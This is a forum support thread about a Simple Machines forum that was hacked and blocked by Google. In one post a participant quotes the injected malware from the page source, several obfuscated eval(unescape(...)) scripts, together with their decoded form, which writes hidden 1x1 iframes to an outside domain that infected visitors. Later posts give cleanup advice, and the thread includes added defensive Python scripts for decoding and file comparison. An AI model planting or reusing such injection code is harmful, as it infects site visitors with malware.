Hi my forum is blocked?

Started by rakicko, November 17, 2010, 03:57:20 AM

rakicko

Hi, yesterday my forum was blocked on Google. I found an error in the index file and I removed it, and sent a request to Google for a review, but there is still an error.
http://www.champions-side.com

Take a look, and please help me.

( Edit: LexArma removed the active link. )

willemjan

Yeah because my Anti-Virus software goes wild on that site! You should clean that out dude!

Joker™

There is some script running at your site (take a look at source code of your site)

try kb scan
http://www.simplemachines.org/community/index.php?topic=313201.msg2078209#msg2078209
Github Profile
Android apps
Medium

How to enable Post Moderation

"For the wise man looks into space and he knows there is no limited dimensions." - Laozi

All support seeking PM's get microwaved

willemjan

I actually got an ****** load of trojans in my comp because of that site....

rakicko

People, I had some code on index..and I removed that..and now the site is good..so no fuk..trojans around..I scanned with Joker's advice and every file is good.

willemjan

Well, my AV doesn't lie... It went crazy on your site. Somehow there must be something in there...

I have to apologise for my previous reaction here. Didn't mean to sound harsh...  :)

rakicko

I think that your AV just reported it as a virus, just like you can see on the home or other page..but I think if Google removes that screen everything will be fine..does someone have advice?

willemjan

Yeah, of course. First of all, what kind of script(s) did you add?

rakicko

Nothing..I just woke up and saw that screen. I took a look at my index file and at the end I found unusual code..my host told me to remove that..I removed it..and I reported to Google to review.

willemjan

It sounds like someone has been able to modify your files. Are there other people with FTP access?

Joker™

Quote from: rakicko on November 17, 2010, 04:55:55 AM
Nothing..I just woke up and saw that screen. I took a look at my index file and at the end I found unusual code..my host told me to remove that..I removed it..and I reported to Google to review.
I would call such malicious script in your files as hacking of website. Google may have banned you because of such script in your file only.

willemjan

Quote from: Joker™ on November 17, 2010, 06:04:01 AM
Quote from: rakicko on November 17, 2010, 04:55:55 AM
Nothing..I just woke up and saw that screen. I took a look at my index file and at the end I found unusual code..my host told me to remove that..I removed it..and I reported to Google to review.
I would call such malicious script in your files as hacking of website. Google may have banned you because of such script in your file only.
My thought too, but was wanting to exclude all other options  :)

rakicko

I think Google banned me for that..but I removed that script, and nobody has access to my FTP.

willemjan

I advise you to change all of your passwords (FTP, Database, Username, any other) of your website. Then make sure there are no strange files on your site.

Do you have a lot of custom coding on that site?

ThatGuyWhoKnowsThings

I don't think you have fixed it. I'm getting alerts.

willemjan

Quote from: mentaljason on November 17, 2010, 08:57:18 AM
I don't think you have fixed it. I'm getting alerts.

Make sure you do a deep virus scan... I've found 4 trojans on my computer after going to that site.

ThatGuyWhoKnowsThings

Quote from: willemjan on November 17, 2010, 08:58:50 AM
Quote from: mentaljason on November 17, 2010, 08:57:18 AM
I don't think you have fixed it. I'm getting alerts.

Make sure you do a deep virus scan... I've found 4 trojans on my computer after going to that site.

It is the college computer system, they use a proxy called "bloxx" and other servers preventing things like that from getting on the system, no need to worry :) Thanks for the heads up though!

ThatGuyWhoKnowsThings

Just looking at the source and this seems very suspicious.
<script>eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%73%65%64%70%6F%6F%2E%63%6F%6D%2F%3F%33%39%35%39%31%38%37%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%3E%3C%2F%69%66%72%61%6D%65%3E%27%29'));</script><!-- uy7gdr5332rkmn --><script>eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%73%65%64%70%6F%6F%2E%63%6F%6D%2F%3F%34%32%30%38%37%33%34%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%3E%3C%2F%69%66%72%61%6D%65%3E%27%29'));</script><!-- uy7gdr5332rkmn --><script>eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%73%65%64%70%6F%6F%2E%63%6F%6D%2F%3F%33%39%35%39%31%38%37%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%3E%3C%2F%69%66%72%61%6D%65%3E%27%29'));</script><!-- uy7gdr5332rkmn --><script>eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%73%65%64%70%6F%6F%2E%63%6F%6D%2F%3F%33%39%35%39%31%38%37%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%3E%3C%2F%69%66%72%61%6D%65%3E%27%29'));</script><!-- uy7gdr5332rkmn --><script>eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%73%65%64%70%6F%6F%2E%63%6F%6D%2F%3F%33%39%35%39%31%38%37%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%3E%3C%2F%69%66%72%61%6D%65%3E%27%29'));</script><!-- uy7gdr5332rkmn --><script>eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%73%65%64%70%6F%6F%2E%63%6F%6D%2F%3F%33%39%35%39%31%38%37%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%3E%3C%2F%69%66%72%61%6D%65%3E%27%29'));</script><!-- uy7gdr5332rkmn 
--><script>eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%73%65%64%70%6F%6F%2E%63%6F%6D%2F%3F%33%39%35%39%31%38%37%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%3E%3C%2F%69%66%72%61%6D%65%3E%27%29'));</script><!-- uy7gdr5332rkmn -->

It seems rather "encoded" don't you think?

After decode:
<script>eval(unescape('document.write('<iframe src="http://sedpoo.com/?3959187" width=1 height=1></iframe>')'));</script><!-- uy7gdr5332rkmn --><script>eval(unescape('document.write('<iframe src="http://sedpoo.com/?4208734" width=1 height=1></iframe>')'));</script><!-- uy7gdr5332rkmn --><script>eval(unescape('document.write('<iframe src="http://sedpoo.com/?3959187" width=1 height=1></iframe>')'));</script><!-- uy7gdr5332rkmn --><script>eval(unescape('document.write('<iframe src="http://sedpoo.com/?3959187" width=1 height=1></iframe>')'));</script><!-- uy7gdr5332rkmn --><script>eval(unescape('document.write('<iframe src="http://sedpoo.com/?3959187" width=1 height=1></iframe>')'));</script><!-- uy7gdr5332rkmn --><script>eval(unescape('document.write('<iframe src="http://sedpoo.com/?3959187" width=1 height=1></iframe>')'));</script><!-- uy7gdr5332rkmn --><script>eval(unescape('document.write('<iframe src="http://sedpoo.com/?3959187" width=1 height=1></iframe>')'));</script><!-- uy7gdr5332rkmn -->
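
Added example, not part of the original thread: a Python sketch that statically decodes eval(unescape('...')) blocks like the one quoted above and lists the iframes they would write, without running the script. The function names and the injected.example sample are constructed for illustration.

```python
import re

# JavaScript unescape(): %XX is one Latin-1 character, %uXXXX one UTF-16 unit.
_ESC = re.compile(r"%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})")
# eval(unescape('...')) with a quoted literal argument, as in the post above.
_CALL = re.compile(r"eval\s*\(\s*unescape\s*\(\s*(['\"])(.*?)\1\s*\)\s*\)", re.S)
_IFRAME = re.compile(r"<iframe\b[^>]*>", re.I)
_ATTR = re.compile(r"""([a-z-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""", re.I)


def js_unescape(s):
    """Decode like JavaScript's unescape(), without executing anything."""
    return _ESC.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), s)


def find_injections(html):
    """Return one record per eval(unescape(...)) call found in html."""
    findings = []
    for call in _CALL.finditer(html):
        decoded = js_unescape(call.group(2))
        frames = []
        for tag in _IFRAME.findall(decoded):
            attrs = {m.group(1).lower(): m.group(2) or m.group(3) or m.group(4) or ""
                     for m in _ATTR.finditer(tag)}
            # A 0- or 1-pixel frame is invisible to the visitor.
            hidden = all(attrs.get(k, "").strip() in ("0", "1") for k in ("width", "height"))
            frames.append({"src": attrs.get("src", ""), "hidden": hidden})
        findings.append({"offset": call.start(), "decoded": decoded, "iframes": frames})
    return findings


def _encode(js):
    """Percent-encode every character, to build the constructed sample."""
    return "".join("%{:02X}".format(ord(c)) for c in js)


# Constructed sample: same shape as the injected block, placeholder domain.
SAMPLE = ("<html><body>forum</body></html>"
          "<script>eval(unescape('" +
          _encode("document.write('<iframe src=\"http://injected.example/?1\" "
                  "width=1 height=1></iframe>')") +
          "'));</script><!-- marker -->")

if __name__ == "__main__":
    for f in find_injections(SAMPLE):
        print(f["offset"], f["decoded"], f["iframes"])
```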

willemjan


ThatGuyWhoKnowsThings

It does seem your website has been hacked then. You should find your index file and look for abnormalities. The code I posted above (the encoded one) will lie in one of your scripts or will be included from somewhere. If you can't find it, I suggest a fresh SMF install (scan yourself too). There are viruses. Then block sedpoo.com to prevent the iframes giving you a virus when you are on.

willemjan

I agree. But if you have a backup of your website (from before you got blocked on Google), then you can restore that instead of a fresh install.

But make sure you change your passwords!

rakicko

I found that code yesterday on the index page..and removed it..and how to scan? Download the full website and scan with antivirus??

willemjan

Scanning the website for viruses won't help. The viruses are probably being loaded through those iframes. Don't know if it's even possible to scan a live website. Here is a step-by-step plan of what you should do:

1. Change all of your passwords.
2. Scan your computer for viruses and block sedpoo.com.
3. Find any strange coding on your site and delete it.
4. If you can't find strange coding, then use a backup or a fresh install.

Joker™

My suggestion, if you can, take a large upgrade and re-install whole website ;).

ThatGuyWhoKnowsThings

Well, I am rather inexperienced with this, but here is what I would deduct and the actions I would take:

The script is in the source code 2 times, at the start and at the end, outside of the start tags for the main script. That means in your index, see what the first "markup styled" action is, because it is at the top and bottom. So look for "un-needed" or external "includes", i.e. a line saying include "iamahacksite.hazes/iframehack";, or, if they have just inserted the code into the file as is, look for the <script> that I posted earlier (the encoded one). Just do searches in the main files (it would be one of the first files, as it is at the very top of the source code).

Check file

index.php
For code:
include & <script>
And remove anything unusual or suspicious. (Download Clean SMF and look for what includes are usual)

Also, if you have any ads, remember, they will not be in the default code.

Hope this helps.

Also, check any mods you have for "security" problems, check your own additions, and change your FTP password.
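
Added example, not part of the original thread: one way to do the comparison against a clean SMF download suggested above, in Python. It hashes the web files in both trees and lists files that differ, files that exist only on the live site, and files containing the eval(unescape( pattern from the injected script; the function names and the small trees built in demo() are constructed, and the clean copy is assumed to be the same release as the live site.

```python
import hashlib
import pathlib
import re
import tempfile

# Byte pattern of the injection quoted in this thread; nothing is executed.
MARKER = re.compile(rb"eval\s*\(\s*unescape\s*\(")
WEB_EXTS = (".php", ".js", ".html", ".htm")


def _index(root):
    """Map relative path -> (sha256 hex, has_marker) for web files under root."""
    out = {}
    for path in pathlib.Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in WEB_EXTS:
            data = path.read_bytes()
            out[path.relative_to(root).as_posix()] = (
                hashlib.sha256(data).hexdigest(), bool(MARKER.search(data)))
    return out


def compare_with_clean(clean_root, live_root):
    """Classify live files against a clean copy of the same release."""
    clean, live = _index(clean_root), _index(live_root)
    report = {"modified": [], "extra": [], "marker": []}
    for rel, (digest, marked) in sorted(live.items()):
        if rel not in clean:
            report["extra"].append(rel)     # mods, uploads, or planted files
        elif clean[rel][0] != digest:
            report["modified"].append(rel)  # Settings.php and mods differ legitimately
        if marked and not clean.get(rel, ("", False))[1]:
            report["marker"].append(rel)    # pattern absent from the clean copy
    return report


def demo():
    """Compare two small constructed trees built in a temporary directory."""
    files = {"clean/index.php": b"<?php echo 'forum'; ?>",
             "clean/Sources/Load.php": b"<?php // loader ?>",
             "live/index.php": b"<?php echo 'forum'; ?><script>eval(unescape('%41'));</script>",
             "live/Sources/Load.php": b"<?php // loader ?>",
             "live/Themes/extra.php": b"<?php // not in the release ?>"}
    with tempfile.TemporaryDirectory() as tmp:
        for rel, data in files.items():
            p = pathlib.Path(tmp, rel)
            p.parent.mkdir(parents=True, exist_ok=True)
            p.write_bytes(data)
        return compare_with_clean(pathlib.Path(tmp, "clean"), pathlib.Path(tmp, "live"))
```

Files listed under "modified" or "extra" still need a manual look, since installed mods and the site's own settings change files legitimately.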
 

rakicko

I found that code in a lot of index files..and removed it..I updated from rc03 to rc 04...hope it works now..I will contact Google..

rakicko


willemjan

Upgrading probably did a lot. I'm at work now, so I am not going to your site to check it... I'll do that when I'm home.

Have you changed your FTP password? Have you changed your DB password? Have you changed the password of the admin account?

rakicko

Can you access the forum now? I changed the FTP password and admin password..

willemjan

No, I'm still at my work. Rather do that on my personal comp. I'll try it tonight, ok?

rakicko

OK, I asked a few people and they can access..I can access too..try it tonight and let me know..

willemjan

Everything seems to be ok now. Good job  ;)

Have you scanned your computer?

rakicko

Yes, I have a lot of viruses on my computer..I will reinstall my Windows today..to clean it all.

willemjan

I guess that's solved then. If it is, mark it so.
